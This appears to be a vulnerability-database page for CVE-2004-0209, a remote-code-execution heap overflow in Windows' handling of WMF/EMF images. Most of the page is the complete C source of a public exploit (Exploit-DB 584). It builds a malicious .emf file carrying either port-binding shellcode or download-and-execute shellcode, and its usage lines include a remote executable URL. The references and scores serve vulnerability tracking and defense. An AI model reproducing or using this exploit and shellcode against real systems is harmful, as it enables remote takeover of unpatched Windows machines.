CVE-2004-0209 : Detail

CVE-2004-0209

79.27%V4
Network
2004-10-16
02h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer."

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 584

Publication date : 2004-10-19 22h00 +00:00
Author : houseofdabus
EDB Verified : Yes

/* HOD-ms04032-emf-expl2.c: * * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow * * Exploit version 0.2 (PUBLIC) coded by * * * .::[ houseofdabus ]::. * * * [at inbox dot ru] * ------------------------------------------------------------------- * About WMF/EMF: * Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats * are vector files that can contain a raster image... * * ------------------------------------------------------------------- * The vulnerability will be triggered by either viewing a malicious * file or by navigating to a directory, which contains a malicious * file and displays it as a thumbnail. * * Graphics Rendering Engine Vulnerability - CAN-2004-0209 * ------------------------------------------------------------------- * Tested on: * - Internet Explorer 6.0 (SP1) (iexplore.exe) * - Explorer (explorer.exe) * - Windows XP SP1 * * ------------------------------------------------------------------- * Compile: * Win32/VC++ : cl HOD-ms04032-emf-expl.c * Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib * Linux : gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c * * ------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP] * * Shellcode: * 1 - Portbind shellcode * 2 - Connectback shellcode * * ------------------------------------------------------------------- * Examples: * * C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777 * * C:\>HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe * * ------------------------------------------------------------------- * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. * */ /* #define _WIN32 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef _WIN32 #pragma comment(lib,"ws2_32") #include <winsock2.h> #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #endif #include <windows.h> unsigned char emfheader[] = "\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00" "\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00" "\xEB\x12\x90\x90\x90\x90\x90\x90" "\x9e\x5c\x05\x78" /* call [edi+0x74h] - rpcrt4.dll */ "\xb4\x73\xed\x77"; /* Top SEH - XP SP1 */ unsigned char portbind_sc[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff" "\xff\xff\x8b\xc5\x83\xc0\x11\x33\xc9\x66\xb9\xc9\x01\x80\x30\x88" "\x40\xe2\xfa\xdd\x03\x64\x03\x7c\x09\x64\x08\x88\x88\x88\x60\xc4" "\x89\x88\x88\x01\xce\x74\x77\xfe\x74\xe0\x06\xc6\x86\x64\x60\xd9" "\x89\x88\x88\x01\xce\x4e\xe0\xbb\xba\x88\x88\xe0\xff\xfb\xba\xd7" "\xdc\x77\xde\x4e\x01\xce\x70\x77\xfe\x74\xe0\x25\x51\x8d\x46\x60" "\xb8\x89\x88\x88\x01\xce\x5a\x77\xfe\x74\xe0\xfa\x76\x3b\x9e\x60" "\xa8\x89\x88\x88\x01\xce\x46\x77\xfe\x74\xe0\x67\x46\x68\xe8\x60" "\x98\x89\x88\x88\x01\xce\x42\x77\xfe\x70\xe0\x43\x65\x74\xb3\x60" "\x88\x89\x88\x88\x01\xce\x7c\x77\xfe\x70\xe0\x51\x81\x7d\x25\x60" "\x78\x88\x88\x88\x01\xce\x78\x77\xfe\x70\xe0\x2c\x92\xf8\x4f\x60" "\x68\x88\x88\x88\x01\xce\x64\x77\xfe\x70\xe0\x2c\x25\xa6\x61\x60" "\x58\x88\x88\x88\x01\xce\x60\x77\xfe\x70\xe0\x6d\xc1\x0e\xc1\x60" "\x48\x88\x88\x88\x01\xce\x6a\x77\xfe\x70\xe0\x6f\xf1\x4e\xf1\x60" "\x38\x88\x88\x88\x01\xce\x5e\xbb\x77\x09\x64\x7c\x89\x88\x88\xdc" "\xe0\x89\x89\x88\x88\x77\xde\x7c\xd8\xd8\xd8\xd8\xc8\xd8\xc8\xd8" "\x77\xde\x78\x03\x50\xdf\xdf\xe0\x8a\x88\xAB\x6F\x03\x44\xe2\x9e" "\xd9\xdb\x77\xde\x64\xdf\xdb\x77\xde\x60\xbb\x77\xdf\xd9\xdb\x77" "\xde\x6a\x03\x58\x01\xce\x36\xe0\xeb\xe5\xec\x88\x01\xee\x4a\x0b" "\x4c\x24\x05\xb4\xac\xbb\x48\xbb\x41\x08\x49\x9d\x23\x6a\x75\x4e" "\xcc\xac\x98\xcc\x76\xcc\xac\xb5\x01\xdc\xac\xc0\x01\xdc\xac\xc4" "\x01\xdc\xac\xd8\x05\xcc\xac\x98\xdc\xd8\xd9\xd9\xd9\xc9\xd9\xc1" "\xd9\xd9\x77\xfe\x4a\xd9\x77\xde\x46\x03\x44\xe2\x77\x77\xb9\x77" "\xde\x5a\x03\x40\x77\xfe\x36\x77\xde\x5e\x63\x16\x77\xde\x9c\xde" "\xec\x29\xb8\x88\x88\x88\x03\xc8\x84\x03\xf8\x94\x25\x03\xc8\x80" "\xd6\x4a\x8c\x88\xdb\xdd\xde\xdf\x03\xe4\xac\x90\x03\xcd\xb4\x03" "\xdc\x8d\xf0\x8b\x5d\x03\xc2\x90\x03\xd2\xa8\x8b\x55\x6b\xba\xc1" "\x03\xbc\x03\x8b\x7d\xbb\x77\x74\xbb\x48\x24\xb2\x4c\xfc\x8f\x49" "\x47\x85\x8b\x70\x63\x7a\xb3\xf4\xac\x9c\xfd\x69\x03\xd2\xac\x8b" "\x55\xee\x03\x84\xc3\x03\xd2\x94\x8b\x55\x03\x8c\x03\x8b\x4d\x63" "\x8a\xbb\x48\x03\x5d\xd7\xd6\xd5\xd3\x4a\x8c\x88"; unsigned char download_sc[]= "\x90\x90\x90\x90\x90\x90\x90\x90" "\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4" "\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26" "\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14" "\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E" "\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48" "\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB" "\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65" "\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17" "\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10" "\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1" "\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED" "\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13" "\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17" "\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17" "\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8" "\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE" "\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17" "\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17" "\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40" "\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8" "\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17" "\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17" "\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1" "\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7" "\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92" "\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A" "\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40" "\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50" "\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B" "\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65" "\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72" "\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B" "\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E" "\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72" "\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56" "\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65" "\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73" "\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27" "\x27\x39\x72\x6F\x72\x17""HOD""\x21"; unsigned char endoffile[] = "\x00\x00\x00\x00"; void usage(char *prog) { printf("Usage:\n"); printf("%s <file> <shellcode> <bindport / url>\n", prog); printf("\nShellcode:\n"); printf(" 1 - Portbind shellcode\n"); printf(" 2 - Download & exec shellcode\n\n"); exit(0); } int main(int argc, char **argv) { char endofurl = '\x01'; unsigned short port; int sc; FILE *fp; printf("\n(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow\n\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 4) usage(argv[0]); sc = atoi(argv[2]); if ((sc > 2) || (sc < 1)) usage(argv[0]); fp = fopen(argv[1], "wb"); if (fp == NULL) { printf("[-] error: can\'t create file: %s\n", argv[1]); exit(0); } /* header */ fwrite(emfheader, 1, sizeof(emfheader)-1, fp); printf("[*] Shellcode: "); if (sc == 1) { port = atoi(argv[3]); printf("Portbind, port = %u\n", port); port = htons(port^(unsigned short)0x8888); memcpy(portbind_sc+266, &port, 2); fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp); fwrite(endoffile, 1, 4, fp); } else { printf("Download & exec, url = %s\n", argv[3]); fwrite(download_sc, 1, sizeof(download_sc)-1, fp); fwrite(argv[3], 1, strlen(argv[3]), fp); fwrite(&endofurl, 1, 1, fp); fwrite(endoffile, 1, 4, fp); } printf("[+] Ok\n"); fclose(fp); return 0; } // milw0rm.com [2004-10-20]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version r2

    Microsoft>>Windows_xp >> Version *

    References

    http://www.securityfocus.com/bid/11375
    Tags : vdb-entry, x_refsource_BID
    http://www.kb.cert.org/vuls/id/806278
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://marc.info/?l=bugtraq&m=109829067325779&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ